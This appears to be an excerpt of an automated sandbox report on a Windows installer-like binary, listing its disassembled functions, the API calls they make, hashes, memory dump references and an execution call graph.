                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                              • String ID:
                                                              • API String ID: 1694776339-0
                                                              • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                              • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                              • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                              • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                              Function 004053C4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$DefaultSystem
                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                              • API String ID: 1044490935-665933166
                                                              • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                              • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                              • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                              • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                              Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                              • LocalFree.KERNEL32(005AA360,00000000,00401AB4), ref: 00401A1B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,005AA360,00000000,00401AB4), ref: 00401A3A
                                                              • LocalFree.KERNEL32(005AB360,?,00000000,00008000,005AA360,00000000,00401AB4), ref: 00401A79
                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                              • String ID:
                                                              • API String ID: 3782394904-0
                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                              Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000$9@
                                                              • API String ID: 1220098344-1503883590
                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                              Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                              • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                              Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                              • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: 8&Y$U1hd.@
                                                              • API String ID: 2123368496-2874236510
                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                              Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID: )q@
                                                              • API String ID: 3660427363-2284170586
                                                              • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                              • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                              • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                              • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                              Function 00409C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                              Strings
                                                              • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                              • Setup, xrefs: 00409CAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                              • API String ID: 2030045667-3271211647
                                                              • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                              • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                              • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                              • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                              Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastSleep
                                                              • String ID:
                                                              • API String ID: 1458359878-0
                                                              • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                              • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                              • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                              • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                              Execution Graph

                                                              Execution Coverage:15.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:4.6%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:87
                                                              execution_graph 50439 40cd00 50440 40cd0d 50439->50440 50442 40cd12 50439->50442 50443 406f48 CloseHandle 50440->50443 50443->50442 50444 492848 50445 49287c 50444->50445 50446 49287e 50445->50446 50447 492892 50445->50447 50590 446f9c 18 API calls 50446->50590 50450 4928ce 50447->50450 50451 4928a1 50447->50451 50449 492887 Sleep 50507 4928c9 50449->50507 50456 49290a 50450->50456 50457 4928dd 50450->50457 50580 446ff8 50451->50580 50454 4928b0 50458 4928b8 FindWindowA 50454->50458 50462 492919 50456->50462 50463 492960 50456->50463 50459 446ff8 18 API calls 50457->50459 50584 447278 50458->50584 50461 4928ea 50459->50461 50465 4928f2 FindWindowA 50461->50465 50591 446f9c 18 API calls 50462->50591 50468 4929bc 50463->50468 50469 49296f 50463->50469 50467 447278 5 API calls 50465->50467 50466 492925 50592 446f9c 18 API calls 50466->50592 50492 492905 50467->50492 50477 4929cb 50468->50477 50481 492a18 50468->50481 50595 446f9c 18 API calls 50469->50595 50472 492932 50593 446f9c 18 API calls 50472->50593 50473 49297b 50596 446f9c 18 API calls 50473->50596 50476 49293f 50594 446f9c 18 API calls 50476->50594 50600 446f9c 18 API calls 50477->50600 50479 492988 50597 446f9c 18 API calls 50479->50597 50488 492a52 50481->50488 50489 492a27 50481->50489 50482 4929d7 50601 446f9c 18 API calls 50482->50601 50484 49294a SendMessageA 50487 447278 5 API calls 50484->50487 50486 492995 50598 446f9c 18 API calls 50486->50598 50487->50492 50498 492a61 50488->50498 50499 492aa0 50488->50499 50493 446ff8 18 API calls 50489->50493 50490 4929e4 50602 446f9c 18 API calls 50490->50602 50492->50507 50496 492a34 50493->50496 50495 4929a0 PostMessageA 50599 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50495->50599 50501 492a3c RegisterClipboardFormatA 50496->50501 50497 4929f1 50603 446f9c 18 API calls 50497->50603 50605 446f9c 18 API calls 50498->50605 50508 492aaf 50499->50508 50509 492af4 50499->50509 50504 447278 5 API calls 50501->50504 50504->50507 50505 4929fc SendNotifyMessageA 50604 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50505->50604 50506 492a6d 50606 446f9c 18 API calls 50506->50606 50630 403420 50507->50630 50608 446f9c 18 API calls 50508->50608 50518 492b48 50509->50518 50519 492b03 50509->50519 50513 492a7a 50607 446f9c 18 API calls 50513->50607 50514 492abb 50609 446f9c 18 API calls 50514->50609 50517 492a85 SendMessageA 50522 447278 5 API calls 50517->50522 50527 492baa 50518->50527 50528 492b57 50518->50528 50612 446f9c 18 API calls 50519->50612 50521 492ac8 50610 446f9c 18 API calls 50521->50610 50522->50492 50523 492b0f 50613 446f9c 18 API calls 50523->50613 50526 492ad3 PostMessageA 50611 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50526->50611 50535 492bb9 50527->50535 50536 492c31 50527->50536 50531 446ff8 18 API calls 50528->50531 50529 492b1c 50614 446f9c 18 API calls 50529->50614 50533 492b64 50531->50533 50616 42e394 SetErrorMode 50533->50616 50534 492b27 SendNotifyMessageA 50615 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50534->50615 50539 446ff8 18 API calls 50535->50539 50545 492c40 50536->50545 50546 492c66 50536->50546 50543 492bc8 50539->50543 50540 492b71 50541 492b87 GetLastError 50540->50541 50542 492b77 50540->50542 50547 447278 5 API calls 50541->50547 50544 447278 5 API calls 50542->50544 50619 446f9c 18 API calls 50543->50619 50548 492b85 50544->50548 50624 446f9c 18 API calls 50545->50624 50555 492c98 50546->50555 50556 492c75 50546->50556 50547->50548 50552 447278 5 API calls 50548->50552 50551 492c4a FreeLibrary 50625 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50551->50625 50552->50507 50553 492bdb GetProcAddress 50557 492c21 50553->50557 50558 492be7 50553->50558 50563 492ca7 50555->50563 50569 492cdb 50555->50569 50559 446ff8 18 API calls 50556->50559 50623 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50557->50623 50620 446f9c 18 API calls 50558->50620 50561 492c81 50559->50561 50567 492c89 CreateMutexA 50561->50567 50626 48ccc8 18 API calls 50563->50626 50564 492bf3 50621 446f9c 18 API calls 50564->50621 50567->50507 50568 492c00 50572 447278 5 API calls 50568->50572 50569->50507 50628 48ccc8 18 API calls 50569->50628 50571 492cb3 50573 492cc4 OemToCharBuffA 50571->50573 50574 492c11 50572->50574 50627 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50573->50627 50622 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50574->50622 50577 492cf6 50578 492d07 CharToOemBuffA 50577->50578 50629 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50578->50629 50581 447000 50580->50581 50634 436078 50581->50634 50583 44701f 50583->50454 50585 447280 50584->50585 50688 4363e0 VariantClear 50585->50688 50587 4472a3 50589 4472ba 50587->50589 50689 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50587->50689 50589->50507 50590->50449 50591->50466 50592->50472 50593->50476 50594->50484 50595->50473 50596->50479 50597->50486 50598->50495 50599->50492 50600->50482 50601->50490 50602->50497 50603->50505 50604->50507 50605->50506 50606->50513 50607->50517 50608->50514 50609->50521 50610->50526 50611->50492 50612->50523 50613->50529 50614->50534 50615->50507 50690 403738 50616->50690 50619->50553 50620->50564 50621->50568 50622->50492 50623->50492 50624->50551 50625->50507 50626->50571 50627->50507 50628->50577 50629->50507 50632 403426 50630->50632 50631 40344b 50632->50631 50633 402660 4 API calls 50632->50633 50633->50632 50635 436084 50634->50635 50645 4360a6 50634->50645 50635->50645 50654 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50635->50654 50636 436129 50663 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50636->50663 50638 436111 50658 403494 50638->50658 50639 436105 50639->50583 50640 4360f9 50649 403510 4 API calls 50640->50649 50641 4360ed 50655 403510 50641->50655 50642 43611d 50662 4040e8 18 API calls 50642->50662 50645->50636 50645->50638 50645->50639 50645->50640 50645->50641 50645->50642 50648 43613a 50648->50583 50653 436102 50649->50653 50651 436126 50651->50583 50653->50583 50654->50645 50664 4034e0 50655->50664 50660 403498 50658->50660 50659 4034ba 50659->50583 50660->50659 50661 402660 4 API calls 50660->50661 50661->50659 50662->50651 50663->50648 50669 4034bc 50664->50669 50666 4034f0 50674 403400 50666->50674 50670 4034c0 50669->50670 50671 4034dc 50669->50671 50678 402648 50670->50678 50671->50666 50673 4034c9 50673->50666 50675 40341f 50674->50675 50676 403406 50674->50676 50675->50583 50676->50675 50683 402660 50676->50683 50679 40264c 50678->50679 50680 402656 50678->50680 50679->50680 50682 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50679->50682 50680->50673 50680->50680 50682->50680 50684 402664 50683->50684 50685 40266e 50683->50685 50684->50685 50687 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50684->50687 50685->50675 50685->50685 50687->50685 50688->50587 50689->50589 50691 40373c LoadLibraryA 50690->50691 50691->50540 54560 498ba8 54618 403344 54560->54618 54562 498bb6 54621 4056a0 54562->54621 54564 498bbb 54624 40631c GetModuleHandleA GetProcAddress 54564->54624 54568 498bc5 54632 40994c 54568->54632 54899 4032fc 54618->54899 54620 403349 GetModuleHandleA GetCommandLineA 54620->54562 54623 4056db 54621->54623 54900 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54621->54900 54623->54564 54625 406338 54624->54625 54626 40633f GetProcAddress 54624->54626 54625->54626 54627 406355 GetProcAddress 54626->54627 54628 40634e 54626->54628 54629 406364 SetProcessDEPPolicy 54627->54629 54630 406368 54627->54630 54628->54627 54629->54630 54631 4063c4 6F561CD0 54630->54631 54631->54568 54901 409024 54632->54901 54899->54620 54900->54623 54902 408cbc 5 API calls 54901->54902 54903 409035 54902->54903 54904 4085dc GetSystemDefaultLCID 54903->54904 54906 408612 54904->54906 54905 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54905->54906 54906->54905 54907 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54906->54907 54908 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54906->54908 54911 408674 54906->54911 54907->54906 54908->54906 54909 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54909->54911 54910 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54910->54911 54911->54909 54911->54910 54912 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54911->54912 54913 4086f7 54911->54913 54912->54911 54914 403420 4 API calls 54913->54914 54915 408711 54914->54915 54916 408720 GetSystemDefaultLCID 54915->54916 54973 408568 GetLocaleInfoA 54916->54973 54919 403450 4 API calls 54920 408760 54919->54920 54921 408568 5 API calls 54920->54921 54922 408775 54921->54922 54923 408568 5 API calls 54922->54923 54924 408799 54923->54924 54979 4085b4 GetLocaleInfoA 54924->54979 54927 4085b4 GetLocaleInfoA 54928 4087c9 54927->54928 54929 408568 5 API calls 54928->54929 54930 4087e3 54929->54930 54931 4085b4 GetLocaleInfoA 54930->54931 54932 408800 54931->54932 54974 4085a1 54973->54974 54975 40858f 54973->54975 54977 403494 4 API calls 54974->54977 54976 4034e0 4 API calls 54975->54976 54978 40859f 54976->54978 54977->54978 54978->54919 54980 4085d0 54979->54980 54980->54927 56338 42f520 56339 42f52b 56338->56339 56340 42f52f NtdllDefWindowProc_A 56338->56340 56340->56339 50692 416b42 50693 416bea 50692->50693 50694 416b5a 50692->50694 50711 41531c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50693->50711 50695 416b74 SendMessageA 50694->50695 50696 416b68 50694->50696 50700 416bc8 50695->50700 50698 416b72 CallWindowProcA 50696->50698 50699 416b8e 50696->50699 50698->50700 50708 41a058 GetSysColor 50699->50708 50703 416b99 SetTextColor 50704 416bae 50703->50704 50709 41a058 GetSysColor 50704->50709 50706 416bb3 SetBkColor 50710 41a6e0 GetSysColor CreateBrushIndirect 50706->50710 50708->50703 50709->50706 50710->50700 50711->50700 56341 4358e0 56342 4358f5 56341->56342 56343 43590f 56342->56343 56347 4352c8 56342->56347 56352 435312 56347->56352 56358 4352f8 56347->56358 56348 403400 4 API calls 56349 435717 56348->56349 56349->56343 56360 435728 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56349->56360 56350 446da4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56350->56358 56351 402648 4 API calls 56351->56358 56352->56348 56353 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56353->56358 56355 431ca0 4 API calls 56355->56358 56356 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56356->56358 56357 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56357->56358 56358->56350 56358->56351 56358->56352 56358->56353 56358->56355 56358->56356 56358->56357 56361 4343b0 56358->56361 56373 434b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56358->56373 56360->56343 56362 43446d 56361->56362 56363 4343dd 56361->56363 56392 434310 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56362->56392 56364 403494 4 API calls 56363->56364 56366 4343eb 56364->56366 56368 403778 4 API calls 56366->56368 56367 43445f 56369 403400 4 API calls 56367->56369 56371 43440c 56368->56371 56370 4344bd 56369->56370 56370->56358 56371->56367 56374 494944 56371->56374 56373->56358 56375 49497c 56374->56375 56376 494a14 56374->56376 56378 403494 4 API calls 56375->56378 56393 448930 56376->56393 56381 494987 56378->56381 56379 494997 56380 403400 4 API calls 56379->56380 56382 494a38 56380->56382 56381->56379 56383 4037b8 4 API calls 56381->56383 56384 403400 4 API calls 56382->56384 56386 4949b0 56383->56386 56385 494a40 56384->56385 56385->56371 56386->56379 56387 4037b8 4 API calls 56386->56387 56388 4949d3 56387->56388 56389 403778 4 API calls 56388->56389 56390 494a04 56389->56390 56391 403634 4 API calls 56390->56391 56391->56376 56392->56367 56394 448955 56393->56394 56395 448998 56393->56395 56396 403494 4 API calls 56394->56396 56398 4489ac 56395->56398 56405 44852c 56395->56405 56397 448960 56396->56397 56402 4037b8 4 API calls 56397->56402 56400 403400 4 API calls 56398->56400 56401 4489df 56400->56401 56401->56379 56403 44897c 56402->56403 56404 4037b8 4 API calls 56403->56404 56404->56395 56406 403494 4 API calls 56405->56406 56407 448562 56406->56407 56408 4037b8 4 API calls 56407->56408 56409 448574 56408->56409 56410 403778 4 API calls 56409->56410 56411 448595 56410->56411 56412 4037b8 4 API calls 56411->56412 56413 4485ad 56412->56413 56414 403778 4 API calls 56413->56414 56415 4485d8 56414->56415 56416 4037b8 4 API calls 56415->56416 56427 4485f0 56416->56427 56417 448628 56419 403420 4 API calls 56417->56419 56418 4486c3 56422 4486cb GetProcAddress 56418->56422 56423 448708 56419->56423 56420 44864b LoadLibraryExA 56420->56427 56421 44865d LoadLibraryA 56421->56427 56424 4486de 56422->56424 56423->56398 56424->56417 56425 403b80 4 API calls 56425->56427 56426 403450 4 API calls 56426->56427 56427->56417 56427->56418 56427->56420 56427->56421 56427->56425 56427->56426 56429 43da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56427->56429 56429->56427 50712 402584 50713 402598 50712->50713 50714 4025ab 50712->50714 50742 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50713->50742 50716 4025c2 RtlEnterCriticalSection 50714->50716 50717 4025cc 50714->50717 50716->50717 50728 4023b4 13 API calls 50717->50728 50718 40259d 50718->50714 50720 4025a1 50718->50720 50721 4025d5 50722 4025d9 50721->50722 50729 402088 50721->50729 50724 402635 50722->50724 50725 40262b RtlLeaveCriticalSection 50722->50725 50725->50724 50726 4025e5 50726->50722 50743 402210 9 API calls 50726->50743 50728->50721 50730 40209c 50729->50730 50731 4020af 50729->50731 50750 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50730->50750 50733 4020c6 RtlEnterCriticalSection 50731->50733 50736 4020d0 50731->50736 50733->50736 50734 4020a1 50734->50731 50735 4020a5 50734->50735 50737 402106 50735->50737 50736->50737 50744 401f94 50736->50744 50737->50726 50740 4021f1 RtlLeaveCriticalSection 50741 4021fb 50740->50741 50741->50726 50742->50718 50743->50722 50747 401fa4 50744->50747 50745 401fd0 50749 401ff4 50745->50749 50756 401db4 50745->50756 50747->50745 50747->50749 50751 401f0c 50747->50751 50749->50740 50749->50741 50750->50734 50760 40178c 50751->50760 50754 401f29 50754->50747 50757 401e02 50756->50757 50758 401dd2 50756->50758 50757->50758 50788 401d1c 50757->50788 50758->50749 50766 4017a8 50760->50766 50762 4017b2 50779 401678 VirtualAlloc 50762->50779 50764 40180f 50764->50754 50770 401e80 9 API calls 50764->50770 50766->50762 50766->50764 50767 401803 